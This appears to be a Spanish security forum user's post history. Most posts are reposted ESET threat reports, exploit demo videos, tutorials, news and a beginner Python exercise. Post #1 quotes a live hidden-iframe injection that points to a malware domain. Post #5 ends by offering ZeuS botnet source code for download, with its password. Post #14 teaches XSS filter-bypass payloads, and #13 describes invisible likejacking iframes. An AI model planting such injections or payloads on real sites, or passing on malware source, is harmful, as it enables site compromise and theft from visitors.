Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - @Sthéfano

#1
Un grupo de investigadores publicó en su blog, una nueva alerta de un ataque masivo a páginas con inyección de iframe activo, que estuvo particularmente focalizado en sitios de e-commerce. El ataque fue reportado con más de 90 mil páginas afectadas. El iframe permite la ejecución de contenido externo en la página que se está visitando. De esta forma, los visitantes de todos los sitios afectados podían infectarse con malware por el solo hecho de visitar un sitio web de confianza.

A través de diversas vulnerabilidades, todas las páginas afectadas se encuentran con la siguiente inyección de iframe:


Código (html4strict) [Seleccionar]
<title>Wholesaler<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>

Una vez que el usuario visita alguna de las web infectadas, se ejecuta en la maquina del usuario, a través de un ataque multi-stage, código javascript que explota las siguientes vulnerabilidades que afectan al explorador web:


  • CVE-2010-0840 – Java Trust
  • CVE-2010-0188 – PDF LibTiff
  • CVE-2010-0886 – Java SMB
  • CVE-2006-0003 – IE MDAC
  • CVE-2010-1885 – HCP

Los dominios donde se alojan los exploit se encuentran en Rusia y son bloqueadas por nuestro software de seguridad. Analizando los sitios donde se encontraba presente este iframe, pudimos encontrar que estos son sensibles a inyecciones de SQL.

Es por eso que ante estos casos, si un desarrollador se encuentra ante este problema, debería revisar el código fuente de todas las páginas del sitio, para buscar este tipo de contenido no legítimo y verificar si el sitio web está infectado. Así también es importante tener en cuenta los siguientes consejos:


  • Que todas las contraseñas del FTP sean rotadas y se utilicen contraseñas fuertes para todos los usuarios. También se recomienda borrar usuarios que no estén en uso.
  • Que el sistema operativo no tenga vulnerabilidades, es decir que que todas las actualizaciones de software estén instaladas.
  • Que las aplicaciones (especialmente la aplicación web o el gestor de contenidos) también tengan todos los parches de seguridad instalados.

Vale destacar que, a este momento, se encuentran en el mismo enlace del buscador provisto por los investigadores, muchos más sitios web infectados por el mismo incidente:


El código malicioso que se descarga en el último paso del ataque, es un troyano.

Fuente: http://blog.armorize.com/
Adaptación: Laboratorios ESET
#2
Para lograr este objetivo, los atacantes realizan lo que se conoce como un ataque de pharming local, en donde a través de la modificación del archivo hosts se redirecciona al usuario a una página falsa, para robar sus claves de acceso. El ataque es simple, la posible víctima ingresa al sitio, cree que está accediendo a su correo electrónico, e intenta iniciar sesión. Sin embargo, al utilizar sus datos para inicio de sesión, recibe un mensaje de error.

Lo que realmente ocurre es que ha caído víctima de este ataque, y ahora sus credenciales se encuentran en manos de los atacantes, quienes podrán utilizarlas para continuar propagando esta amenaza a todos sus contactos. A continuación se puede observar qué es lo que realmente se almacena en este servidor:


En la imagen anterior, se puede observar parte de los archivos de texto en donde se almacenan más de 27.000 credenciales de usuarios de Hotmail, en 13.406 archivos de texto, creados entre el 21 de julio a las 21:56 hasta el martes 26 a las 11:14. Actualmente el sitio se encuentra caído.

Durante un total de 6 días de actividad, los usuarios cuyos equipos se encuentran infectados con esta amenaza, generaron un total de 27.211  registros de correos y contraseñas.

Sobre el total de los datos robados, se encuentran 8.233 direcciones de correos únicas, lo que resulta en un promedio de 3 accesos por usuario, que no pudieron reconocer una página falsa, en un total de 6 días de actividad del sitio malicioso. En otras palabras, más de 8.200 personas son víctimas potenciales del robo de información e identidad por parte de los desarrolladores de este ataque.

Tomando las fechas de los datos registrados en el servidor de los atacantes, se puede concluir, que las víctimas del engaño, infectaron sus equipos a través de los correos falsos que decían contener un video de la presidenta de Brasil, Dilma Rousseff, y las fotos del fallecimiento de Amy Winehouse.

En conclusión, los atacantes, hacen uso de la Ingeniería Social, con el objetivo de atraer la atención de los usuarios y así robar su información.

Fuente: Laboratorios ESET
#3
Un usuario comenta en su blog la presentación de Greg Stein, ingeniero administrador del grupo Open Source de Google, en la reciente SDForum Python Meeting:
En Google, Python es uno de 3 "lenguajes oficiales", junto con C++ y Java. Oficial significa que los empleados de Google pueden usar estos lenguajes
en proyectos de producción (los que usamos todo el mundo).

Internamente, la gente de Google puede usar muchas otras tecnologías, incluyendo PHP, C#, Ruby y Perl.
Python está bien adecuado a los procesos de ingeniería en Google. El típico proyecto en Google tiene un equipo pequeño (de 3 pesonas) y una corta duración (de 3 meses).

Después de que el proyecto se ha terminado, los desarrolladores pueden irse a otros proyectos. Los proyectos más grandes pueden subdividirse en otros más pequeños
presentables en 3 meses, y los equipos pueden elegir su propio lenguaje para el proyecto.

A los ingenieros se les da el 20% del tiempo en su trabajo para que lo apliquen en lo que sea que quieran. Muchas de las nuevas ideas de Google provienen de este 20%,
y "de abajo hacia arriba" parece ser el mantra en Google.

Internamente, Google ha estado usando Python 2.2. Es difícil para ellos mudarse a la v2.3 o v2.4 por la gran cantidad de computadoras que tienen y la compatibilidad
entre todas ellas. Sin embargo, pronto intentarán actualizarse a la v2.4.

Los programadores Python en Google deben seguir una estricta pauta de estilo (basada en PEP8 con indentación de 2 espacios). Cuando a los ingenieros se les otorga
acceso al sistema de Google de administración de código fuente, deben pasar antes una prueba de estilo. Todo el código debe pasar la supervisión de 2 pares de ojos
antes de ser aceptado.

El sistema de builds de Google está escrito en Python. Todo el código corporativo de Google es alamacenado en un repositorio y las dependencias y la construcción
de este código es administrado por Python. Stein mencionó que crear code.google.com llevó 100 líneas de código Python. Pero debido a que tenía tantas dependencias,
el sistema de builds generó un archivo makefile de 3 Mb para él.

Google tiene un sistema interno de empaquetado de software, similar al RPM de Red Hat. Estos paquetes son creados usando Python.

Alex Martelli está trabajando en optimizar las transferencias de datos binarios entre miles de servidores, usando Python.

Todo el monitoreo, reinicialización y recolección de datos de los servidores de producción se realiza en Python.

Los logs son anlizados y los reportes generados usando Python.

Python también se usa en algunos servicios como code.google.com y los Google Groups. La mayoría de los front-ends están escritos en C++ (incluído www.google.com)
y también en Java (como Gmail). Todos los servicios web están construidos sobre un servidor http altamente optimizado que cuenta con SWIG para conectar programas
escritos en C o C++ con otros lenguajes de scripting como Perl, Ruby o Python.

Stein también comentó que el código que Google liberó como Open Source hasta ahora no ha sido muy interesante. Pero espera que eso cambie en el futuro cercano.
También notó que probablemente liberen su sistema de empaquetado de software.

Fuente: http://www.vivalinux.com.ar/articulos/python-en-google
#4
Desde el editor de registro de windows Inicio - Ejecutar - "Regedit"


Vamos a  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control


Ahora clic derecho > Nueva Clave


Y creamos una nueva clave con el nombre de StorageDevicePolicies


En el panel derecho vamos a crear un nuevo valor DWORD


Ahora, para proteger contra escritura los dispositivos que se conecten, basta con asignarle dicho valor a 1 (uno). Para desactivar la protección asignamos 0 (cero).

Si quisieramos automatizar dicho procedimiento, solo basta con exportar la clave que generamos.


Podemos crear ambos estados (Protección ON – OFF) para facilitar la tarea.


El contenido de cada .reg debe ser similar al de la imagen


Por lo tanto, si requerimos activar la protección contra escritura de un dispositivo USB, solo tenemos que hacer doble click en la llave con el valor 1. Y si trataramos de escribir de alguna manera en dicho dispositivo, nos encontramos con la siguiente advertencia.


Funciona correctamente en Windows XP, Vista y 7. No recuerdo en cuales, me parece que en los ultimos dos, necesita reiniciar.

Fuente: www.sec-track.com
#5
Internet se ha transformado en una preciada plataforma de ataque donde la diseminación de malware a través de aplicativos crimeware es cosa de todos los días. Una gran parte del malware actual se encuentra diseñado con la intención de reclutar computadoras zombis que luego formarán parte de alguna botnet.

Por ejemplo aquí tenemos una pantalla de login del Comando y Control (C&C) de una de estas redes:




Este tipo de aplicativos permiten a los botmaster administrar y controlar cada una de las computadoras infectadas a través de una panel de administración desde el cual pueden ejecutar de manera remota, además de la propagación de malware, otros tipos de acciones maliciosas como DDoS (Denegación de Servicio Distribuida) o el envío de spam, como es el caso de la botnet formada por el troyano Waledac. Aquí, uno de estos panel donde se puede ver la cantidad de sistemas controlados por país:




Hace tiempo pudimos conocer el poder de las botnets cuando se polemizó la prueba realizada por la BBC en torno a una investigación sobre el crimeware actual, dejando en completa evidencia que para quienes se dedican a ello, las botnet, el malware y el crimeware en general, constituyen un negocio sin fronteras.

ZeuS (o Zbot) representa una de las botnet con mayor actividad de la actualidad formando parte del conjunto de aplicativos crimeware que permiten su administración vía web a través de una interfaz.

Sus diferentes módulos de ataque, escritos en PHP, le permiten al botmaster (o a cualquiera de los personajes que alquilan la botnet, como por ejemplo un spammer)  llevar a cabo diferentes actividades de índole delictiva y propagar diferentes códigos maliciosos que colaboran con los ataques; siendo uno de los más activos, los ataques de phishing.

El Kit de este crimeware, ya posee una serie de archivos escritos en html donde cada uno de ellos es la clonación de la página web de diversas entidades bancarias, que ZeuS clasifica de acuerdo al idioma. Es decir, dentro de su estructura encontramos carpetas que alojan cada phishing en idioma español, inglés, ruso (este crimeware proviene de Rusia) y en algunos casos alemán dependiendo de la versión del Kit, listos para ser propagados por el ciberdelincuente.

La siguiente captura muestra el phishing a dos conocidas entidades bancarias:




Las posibilidades fraudulentas que ofrece la botnet son más amplias y no sólo posee clonaciones de páginas de entidades bancarias sino que también de compañías que ofrecen servicios a través de Internet. Entre las que forman parte de la nómina se encuentran:


Además, este crimeware propaga diferentes códigos maliciosos diseñados para realizar diferentes actividades delictivas.

Al igual que otros kits de control, administración y monitoreo vía web a través de una interfaz, estos paquetes crimeware incorporan diferentes módulos de ataque que posibilitan al botmaster propagar diferentes códigos maliciosos a través de diferentes técnicas.

En este sentido, ya vimos una breve introducción a ZeuS, mostrando también la capacidad que posee de realizar ataques de phishing a importantes entidades bancarias y otras compañías que ofrecen servicios por Internet.

Ahora, para completar un poco más el conocimiento sobre esta botnet, que en la actualidad se encuentra muy activa y con alto porcentaje de equipos infectados que forman parte de su red, veamos cuáles son los diferentes códigos maliciosos que propaga.

En principio cabe aclarar que la cantidad y variedad de malware capaz de propagar ZeuS cambia levemente con cada versión del Kit, salvo por el propio código malicioso de la botnet, creado a partir de una aplicación interna del paquete.




Es decir, que también propaga el malware que describo a continuación:


  • Win32/PSW.LdPinch: un troyano cuyo objetivo es recolectar información sensible y confidencial relacionada a nombres de usuarios y contraseñas
  • Win32/TrojanClicker.Delf: otro tipo de troyano que busca registrar la mayor cantidad de click sobre servicios como AdSense y similares
  • Win32/TrojanDownloader.Small: diseñado para descargar otros códigos maliciosos en el equipo infectado

Pero tampoco se queda con ese grupo de cuatro códigos maliciosos, ZeuS es capaz de propagar otros, quizás un poco más conocidos por nuestros lectores:




Se trata de tres códigos maliciosos detectado por ESET NOD32 como:


  • Win32/Adware.SpywareProtect2009: un conocido rogue ampliamente propagado, incluso por otros aplicativos crimeware
  • Win32/Koobface: un gusano diseñado para explotar diferentes redes sociales robando información sensible de los usuarios que hacen uso de ella, volviéndo a la carga recientemente.
  • PDF/Exploit.Pidief: orientado a explotar vulnerabilidades conocidas en los lectores de archivos PDF Acrobat Reader y Foxit Reader

Como podemos apreciar, un total de siete códigos maliciosos que dejan en evidencia que la capacidad de propagación de malware de este crimeware son muy amplias.

Eso es todo, el que esté interesado en el descargar el source de ZeuS puede hacerlo desde aquí:

ZeuS 2.0.8.9 by ANTRAX [pass: zeus]

Saludos!

Fuente: Laboratorios ESET
#6
A la hora de analizar malware, los analistas e investigadores nos encontramos con todo tipo de muestras. Muchas veces nos encontramos con binarios empaquetados cuya finalidad es dificultar su estudio. En esta oportunidad analizaremos una muestra que no solo esta empaquetada, sino que tiene otras características adicionales orientadas a dificultar su análisis y detección.

El binario estudiado en este caso, esta empaquetado con el popular empaquetador UPX, cosa que podemos ver fácilmente con el detector de packers ProtectionID:


Si queremos verificar esto, podemos mirar el Entry Point (EP) con un debugger:


Aquí podemos ver el clásico PUSHAD en el EP de un archivo empaquetado con UPX. Para desempaquetarlo podemos hacerlo a mano, utilizando un método llamado PUSHAD (no lo explicaremos en esta oportunidad pero si alguien quiere consultarlos, puede dejarnos un comentario), o el método mas sencillo, mediante el comando upx -d como vemos en el siguiente gráfico:


Vale destacar que este método no siempre funciona en versiones de UPX modificadas. Finalmente, con cualquiera de ambos métodos llegamos al Original Entry Point, mas conocido como OEP. Para este malware el mismo esta en la dirección 4012c2:


Ya con el programa desempaquetado, al ejecutarlo, una de las primeras llamadas a funciones interesantes que encontramos es GetUserDefaultUILanguage de la librería Kernel32.dll. Esta función sirve para identificar la configuración del lenguaje del teclado en el sistema operativo.

¿Por qué decimos que es una función interesante ? Porque serviría para restringir la infección del malware a determinados equipos con la finalidad de acotar su expansión geográfica. Este tipo de chequeos regionales podemos verlos en Swizzor, que utiliza la función GetSystemDefaultLangID para obtener el lenguaje del sistema. Luego lo compara con un valor hexadecimal para decidir si infecta o no el equipo. También observamos este tipo de acciones en Conficker, que utiliza la función GetKeyboardLayoutList, de la cual obtiene la distribución del teclado y a partir de ella chequea si se instala o no.

Siguiendo con el tema de protecciones anti-debugging, podemos ver que esta muestra posee protecciones contra máquinas virtuales y chequea si es ejecutado en alguno de los entornos virtuales mas conocidos como son VMware. VirtualBox, VirtualPC y QEMU. A continuación podemos ver dicha porción en el código:


Cómo vemos en la imagen de arriba, el código aparece completamente en amarillo, esto se debe a que al iniciar el programa, las direcciones de memoria donde están las instrucciones anti-virtuales se encontraban vacías. Esto nos indica que el código se descomprimió en ejecución. Para poder visualizar este código hay que ejecutarlo, sino solo veríamos estas secciones vacías. Aquí una imagen de como se veían estas mismas secciones antes de ejecutar el programa:


Para terminar con el análisis de las protecciones, esta muestra también chequea nombres y ID de procesos, en este caso como lo debuggeamos con el programa Immunity Debugger, el malware identifica el proceso Immunitydebugger.exe. Otra cosa interesante que hace es identificar si existe o no alguna solución antivirus instalada.


De todas las protecciones que detallamos en este post, la que mas nos perjudica a la hora de analizar malware es la protección anti-VM. Existen muchas formas de detectar que un archivo esta siendo debuggeado en un entorno virtual. Esto puede llegar a ser muy tedioso, ya que la mayoría de los análisis que se hacen son dentro de estos entornos virtualizados, para tratar de aislar así la infección y poder simular lo más posible el comportamiento del malware en un entorno "real". Por suerte existen varias formas de saltearse estas detecciones y lograr ejecutar el malware adentro de una maquina virtual, pero esto ya requiere mas conocimientos para poder identificar en que momento se realiza este chequeo. Una opción mas fácil y totalmente viable, aunque más costosa, seria poseer una maquina física específicamente dedicada para el análisis de malware ya que no recomendamos analizar muestras directamente en la computadora que se utiliza a diario.

Fuente: Laboratorios ESET
#7
[youtube=425,350]http://www.youtube.com/watch?v=xAYvYjFM02A[/youtube]



Autor: caseincorollapg
#8
Bueno, el codigo es bastante simple.

Código (dos) [Seleccionar]
@echo off
if  "%1"=="/?" (
echo [PID /all] Retorna el PID de los procesos en ejecucion
echo.
echo [PID proceso.exe] Retorna el proceso y el numero de PID que posee.
exit /b
)
if "%1"=="/all" (
FOR /F "tokens=1,2" %%A IN ( 'tasklist ^| find ".exe"' ) DO (echo.%%A && echo.%%B)
exit /b
)
:ini
set process=%1
if not defined process (echo.No se ha definido un parametro)
FOR /F "tokens=1,2" %%A IN ( 'tasklist ^| find "%process%"' ) DO (echo.%%A && echo.%%B)
exit /b


Guardenlo en la carpeta System32 de Windows, con el nombre "PID.bat". Luego escriban en la consola PID /? y saldra la ayuda.

Saludos!
#9
[youtube=425,350]http://www.youtube.com/watch?v=1Y37FMR03pY[/youtube]


CVE 2007-2447

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.


Explotando un servidor Samba con acceso a privilegios de Root

Autor: Japtron
#10
[youtube=425,350]http://www.youtube.com/watch?v=uKchtcwZOnc[/youtube]



Demostración de un ataque PostgreSQL y luego, una intrusión mediante SSH.

Autor: Japtron
#11
[youtube=450,375]http://www.youtube.com/watch?v=ANJiPanbYFo[/youtube]


CVE 2004-2687

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.


CVE 2009-1185

udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.



Autor: Japtron
#12
[youtube=450,370]http://www.youtube.com/watch?v=nJLsJt-Q-Eg[/youtube]


Exploiting Apache Tomcat server 5.5 on Metasploitable and gaining root access on Ubuntu by using the Debian OpenSSL Predictable PRNG SSH Keys privilege escalation

Autor: Nishant Das Patnaik.
#13
Clickjacking + Facebook = Likejacking

En estos días tenía pensado escribir un poco sobre los peligros de las cookies que no expiran, así que para empezar el tema nada mejor que hacerlo con esta técnica bautizada como "Likejacking" (en referencia al botón "Like" de Facebook). El Likejacking ha sido carne de noticiario, saliendo en televisión y periódicos recientemente, por lo que me parece algo adecuado para entrar en materia.

El concepto es una combinación de un ataque de clickjacking (creo que ya publiqué algo por el blog en su momento) con los Social Plugins de FB. Se trata de que al clickar un video, o cualquier parte de una web, en realidad estemos clickando un botón de "Like" en forma de iframe invisible, por lo que aparecerá en nuestro muro como que "Nos gusta" esa web. Esto puede dar pie a que algún amigo nuestro también clicke sobre la web que supuestamente nos gusta, y también caiga en la trampa, extendiendose la plaga.

Normalmente se suelen identificar estos enlaces fraudulentos por que tienen nombres o descripciones bastante morbosos y que despiertan esa curiosidad innata en el hombre, de ahí el éxito de su extensión entre los amigos de una persona cuyo FB ha sido "infectado". En lo personal me recuerda a aquellos virus que se extendían vía MSN y que para clickar en el enlace ponían mensajes del tipo "Mira mis últimas fotos en la playa desnuda" y cosas al estilo.

Además del spam y la publicidad gratis que se puede conseguir con esta técnica, los creadores de malware lo están empleando para su distribución, con trucos tan viejos (y todavía efectivos) como hacer que el incauto visitante se descargue un plug-in (hete aquí el malware) para poder visualizar contenido.

El problema es tan generalizado debido a que un elevado número de usuarios de redes sociales por comodidad mantienen las sesiones abiertas a través de cookies que no expiran en vez de cerra sesión y loguearse otra vez cada vez que quieran hacer uso de FB. Amén de las personas que tienen el FB abierto durante todo el día.

El código para poner un "Like" en tu web es bastante simple, con un iframe similar a:

Código (html5) [Seleccionar]
<iframe
src="http://www.facebook.com/plugins/like.php?href=Tu-sitio-web;layout=button_count&show_faces=true&width=100&action=like&font=arial&colorscheme=light"
scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:100px; height:px"></iframe>


Todos los parámetros se pueden modificar (en la propia web de Facebook explican cada uno en detalle). Con este iframe base se puede trabajar para dejarlo invisible (opacity: 0) y además colocarlo en algún punto clave donde el usuario vaya a clickar obligatoriamente. Por supuesto se puede ir más lejos, ofuscando el código por ejemplo.

Autor: The X-C3LL
#14
[XSS] Bypassing de Magics Quotes y otros filtros



Introducción

Para comenzar, repasemos la definición de qué es un XSS...

"XSS es un ataque basado en explotar vulnerabilidades del sistema de validación de HTML incrustado. Su nombre original "Cross Site Scripting", y renombrado XSS para que no sea confundido con las hojas de estilo en cascada (CSS), originalmente abarcaba cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o javascript, en el contexto de otro dominio."

Es decir, la vulnerabilidad del XSS consiste en poder poder inyectar código HTML o código de cualquier lenguaje scripting (javascript, VBscript, etc) que nuestro navegador interpretará, o en el caso de que sea XSS persistente (por ejemplo un XSS a nivel foro o a nivel de GuestBook, donde el código permanece) dentro del propio archivo vulnerable. La importancia de este ataque reside, en por ejemplo, el robo de cookies, u otras acciones...

Pero, los webmasters crean filtros para evitar que usuarios maliciosos puedan inyectar códigos que exploten esta vulnerabilidad. Llegamos así a las llamadas magic quotes, pequeños filtros que evitan el uso de las comillas y de /, transofrmándolas en \ o en \".

También existen otros filtros, los cuales imposibilitan el uso de caracteres no numéricos, etc, en este texto os vamos a dar algunas ideas de como soltear estos incovenientes.



Luchando contra las Magic Quotes

Para empezar, por simple lógica, si la web cuenta con magics quotes, los tags de HTML basados en elementos que necesiten de un cierre con </tag>, porque al sustituir nuestra /, el tag dejaría de funcionar.

Es por ello que debemos de acudir a aquellos elementos vacios tipo <img>. En el caso de usar <img> forzaremos la ejecución de código malicioso aprovechando el elemento onerror, que a parte de permitir ejecutar código maligno, no necesita ser cerrado. Para poder utilizarlo, necesitaremos forzar un error en el tag que lo englobe. En nuestro caso hemos dicho que ibamos a utilizar <img>.

El error que vamos a utilizar es la imposibilidad de cargar una imagen, porque la ruta no es válida. Podríamos hacerlo de esta forma:

Código (javascript) [Seleccionar]
<img src=. onerror=alert(69)>

Como la ruta "." no permitirá cargar una imagen, dará error y se ejecutará lo que pongamos en onerror (en este caso el típico alert). Como podemos ver ya hemos saltado esta magic quote y podemos ejecutar lo que queramos.



Bypasseando filtros de caracteres especiales y no numéricos

Existen otros filtros que sustituyen, o directamente no permiten, introducir caracteres especiales, como las comillas, o letras. Para poder ejecutar nuestros código maligno, tenemos un pequeño abanico de posibilidades, desde usar UNICODE (valor en Hexadecimal del carácter con un % delante de cada carácter), pasando por usar el valor ascii. Existe una función en javascript encargada de hacer esto a la inversa: pasar de ascii a caracter. Esta funcion es String.fromCharCode.

Su uso es muy sencillo, simplemente se colocan los caracteres en valor ascii separados por comas. Tal que así:

Código (javascript) [Seleccionar]
String.fromCharCode(X, Y, Z)

Siendo X, Y, Z, los valores. Veamos por ejemplo como sería el texto "XSS":

Código (javascript) [Seleccionar]
String.fromCharCode(88,83,83)

Para usarlo junto con nuestro alert, simplemente lo introducimos entre () del alert.



Conclusión

Como hemos podido ver, el bypassing de filtros no es algo fijo, sino que se necesita de una cierta imaginación para poder manejarnos dentro del pequeño espacio que nos deja nuestro filtro. En mi opinión lo mejor es usar HTMLENTITIES para evitar ejecutar código html.

Por último decir que esta obra está bajo licencia de Creative Commons, lo que quiere decir que está permitida su distribución, pero manteniendo su autor original, y esas cosas.



Bibliografía

  • Los poderes Secretos del XSS
  • Rompiendo barreras: Analizando la fuente y encontrando XSS's


Autor: The X-C3LL
#15
Seguridad / Windows XP Recovery rogue
3 Junio 2011, 01:49 AM
Los creadores de malware constantemente se encuentran trabajando en propagar sus amenazas para obtener grandes cantidades de victimas y así obtener mayores beneficios. Una de las técnicas muy utilizada para la propagación de malware es  la utilización de BlackHat SEO. Esta técnica, se basa en obtener de forma ilegítima un mejor posicionamiento en los resultados en los buscadores, y así aparecer en los primeros lugares. Estas técnicas, sumado a páginas especialmente diseñadas para la explotación de vulnerabilidades en los sistemas de la victimas, logran que el criminal informático propague de manera muy rápida sus amenazas. Este es un ejemplo del siguiente caso de malware del tipo rogue.

Windows XP Recovery es un rogue que fue reportado a nuestros laboratorios por algunos usuarios afectados, los cuales afirmaban que se infectaban mientras navegaban en páginas, relacionadas con el mundo de los juegos en linea. Una vez que la víctima es infectada con este malware, comienza a realizar un supuesto chequeo a todo el hardware de la maquina, el cual es totalmente falso. En la siguiente imagen se puede ver el supuesto escaneo finalizado:


Analizando el código, es posible observar que los distintos mensajes de alerta se encuentran escritos en distintos idiomas y así el criminal puede abarcar mayor cantidad de víctimas. Uno de los puntos más llamativos de este rogue es la utilización del comando Attrib. Este es utilizado para modificar las propiedades de un archivo, en este caso el rogue lo usa para esconder todos los archivos y carpetas de la víctima y así hacer más creíble los supuestos problemas detectados:


Una vez que la victima intenta aplicar la solución ofrecida por el malware, se carga una falsa ventana de Internet Explorer donde se le pide ingresar los datos personales de la víctima y el número de la tarjeta de crédito para el pago. El malware al detectar que nuestra dirección de IP se encuentra en Argentina,pasó el precio a moneda local con un costo de entre $272 a $309 pesos argentinos, casi unos $60 dólares.


Podemos ver que el trabajo del rogue se basa en pequeños trucos pero bastante efectivos para una víctima que desconoce de este tipo de amenazas. Por eso como siempre os digo, es muy necesario que estas amenazas se den a conocer y la gente empieze a desconfiar más sobre lo que hace en su computadora.

Fuente: Laboratorios ESET
#16
1.    INF/Autorun

Porcentaje total de detecciones: 6.58%

Es un archivo utilizado para ejecutar y proponer acciones automáticamente cuando un medio externo como un CD, DVD dispositivo USB, es leído por el equipo informático.

2.    Win32/Conficker

Porcentaje total de detecciones: 3.61%

Es un gusano que se propaga utilizando Internet como plataforma de ataque, aprovechando diferentes vulnerabilidades en sistemas operativos Microsoft Windows que ya han sido corregidas, además de otras tecnologías como los dispositivos de almacenamiento removible y recursos compartidos en redes. De esta manera, un atacante puede controlar el sistema de forma remota y realizar acciones maliciosas sin necesidad de utilizar credenciales de usuario válidas.

3.    Win32/PSW.OnLineGames

Porcentaje total de detecciones: 1.92%

Es un troyano con capacidades de keylogger y de rootkit que recolecta información vinculada a los juegos en línea y sus usuarios y contraseñas.


4. Win32/Sality

Porcentaje total de detecciones: 1.88%

Sality es un virus polimórfico. Cuando se ejecuta inicia un servicio y crea o elimina claves de registro relacionadas con las actividades de seguridad en el sistema. Modifica los archivos .exe y .scr y desactiva los servicios y procesos relacionados a las soluciones de seguridad.

5. HTML/StartPage.NAE

Porcentaje total de detecciones: 1.78%

Troyano que trata de promover ciertos sitios web por medio de la modificación de los registros de Windows. El código de programación del malware suele estar embebido en páginas HTML. El objetivo de este código malicioso es modificar la página de inicio que se ejecuta al utilizar Microsoft Internet Explorer.

6. JS/Redirector

Porcentaje total de detecciones: 1.59%

Troyano que redirecciona el navegador a una locación URL específica que contiene malware.

7. HTML/IFrame.B

Porcentaje total de detecciones: 1.59%

Detección genérica para etiquetas maliciosas Iframe embebidas en páginas HTML, que redirecciona hacia una URL específica con contenido malicioso.

8. Win32/Autoit

Porcentaje total de detecciones: 1.28%

Se trata de un gusano que se propaga a través de medios removibles en general, aunque algunas variantes se distribuyen vía MSN. Puede llegar al sistema como un archivo descargado desde un sitio web malicioso e incluso descargar nuevo malware. Tras la infección, busca todos los archivos ejecutables y los reemplaza con una copia de sí mismo. Se replica tanto en el disco local como en los recursos de la red.

9. Win32/Bflient.K

Porcentaje total de detecciones: 0.85%

Es un gusano que se propaga a través de medios extraíbles. Puede ser controlado remotamente cada vez que el medio infectado se inserta en la computadora.

10. Win32/Autorun

Porcentaje total de detecciones: 089%

Las amenazas identificadas con la etiqueta "Autorun" son conocidas por utilizar el archivo Autorun.INF. El mismo permite ejecutar automáticamente programas a partir de la inserción de un dispositivo removible en el equipo. No representa una amenaza en sí mismo aunque combinado con un archivo binario es un factor de propagación.

Fuente: Laboratorios ESET
#17
Junto a Asus dio a conocer lo que la fabricante llama una clase de portátiles ultralivianas, con diseños refinados, procesadores de última generación y arranque instantáneo para competir con el poder de las tablets


Intel no quiere perder protagonismo ante el creciente mercado de las tablets, donde sus competidores están logrando imponerse.

Es por ello que se alió con diversos fabricantes para buscar imponer un nuevo tipo de diseño de laptop ultradelgada, a la que bautizó como Ultrabook.

Junto a Asus, mostró en la feria Computex de Taipei el primer modelo de Ultrabook que estará disponible antes de fin de año: la UX21.

Este modelo de Asus, fabricado en aluminio, llevará en su interior un Core i7 de segunda generación, una unidad de estado sólido SATA de 6Gb/s y la función Instant On, que permite iniciar el equipo en pocos segundos.

El equipo tiene un grosor mínimo de 2 milímetros, un máximo de 17 y un peso de apenas 1,1 kilos.

La idea es que los modelos de Ultrabook no tengan un grosor superior a los 20 milímetros. Habrá dos modelos de Asus UX: la UX21 con una pantalla de 11,6 pulgadas y la UX31 con una pantalla de 13,3 pulgadas.

Intel dijo que éste y otros modelos de otros fabricantes estarían a la venta en Navidad por menos de u$s1.000. Las Ultrabook competirán entonces con las MacBook Air (precio inicial de u$s999) y la Samsung Series 9, de muchísimo más valor: u$s1.650.

De acuerdo a Intel, estas nuevas notebooks ultradelgadas permitirán un consumo sostenido de no más de 15 KW. En la actualidad existen algunos modelos que consumen 45 KW.

El consumo mínimo es el de las netbooks con procesador Intel Atom, con 18 KW.

Asus fue una de las primeras en meterse de lleno en la fabricación de netbooks hace unos años atrás, consiguiendo así mejorar su participación en el mercado mundial. Las netbooks fueron un éxito rotundo para Intel, que logró introducir sus procesadores Atom en casi el 100% de los dispositivos de ese tipo.

Intel se ve obligada a fomentar este tipo de dispositivos ante el crecimiento de las tablets y el consiguiente retroceso del segmento de netbooks y ultralivianas.

Las Ultrabooks serán finas y livianas, pero contarán con procesadores de alto rendimiento en lugar de los clásicos chips de bajo consumo (ULV) que Intel ofrece a los fabricantes para diseños delgados.

Deberían representar el 40% de las ventas de portátiles a consumidores a finales del próximo año, dijo Tom Kilroy, ejecutivo de Intel.

Demostración: http://www.youtube.com/watch?feature=player_embedded&v=HYtdh0Ph6O4

Fuente: Infobae.com
#18
Bueno, la verdad me asombro ver como les costo hacerlo a otras personas. Es algo muy sencillo.

CitarHaz un programa con Python que, dados dos números enteros, muestre por pantalla uno de estos mensajes: "El segundo es el cuadrado exacto del primero.", "El segundo es menor que el cuadrado del primero." o "El segundo es mayor que el cuadrado del primero.", dependiendo de la verificación de la condición correspondiente al significado de cada mensaje.

Aquí les dejo mi solución, bien simple y con explicaciones.

Código (python) [Seleccionar]
#!/usr/bin/env python

def Comprobacion(X, Y): # Creamos la funcion para comprobar lo que pide el ejercicio
   Z = X * X # Establecemos 'Z' como el cuadrado del primer numero, nos ayudara en las comprobaciones de los condicionales
   if (Y == Z): # Establecemos una condición. Si el segundo numero es igual a 'Z'
       return 'El segundo es el cuadrado exacto del primero' # Mensaje a retornar si se cumple la condicion
   elif (Y < Z): # Establecemos una condición. Si el segundo numero es menor que 'Z'
       return 'El segundo es menor que el cuadrado del primero' # Mensaje a retornar si se cumple la condicion
   else:
       return 'El segundo es mayor que el cuadrado del primero'

while True: # Bucle Infinito
   try: # Inicilizamos el manejo de errores. 'intentamos' hacer lo siguiente. En caso de error, devolvera el contenido de 'except'
       X = int(input('Ingrese un numero entero: ')) # Pedimos un numero entero, que se llamara 'X'
       Y = int(input('Ingrese otro numero entero: ')) # Pedimos un numero entero, que se llamara 'Z'
       print '%s' % Comprobacion(X, Y) # Imprimimos el valor que nos devuelve la funcion 'Comprobacion'
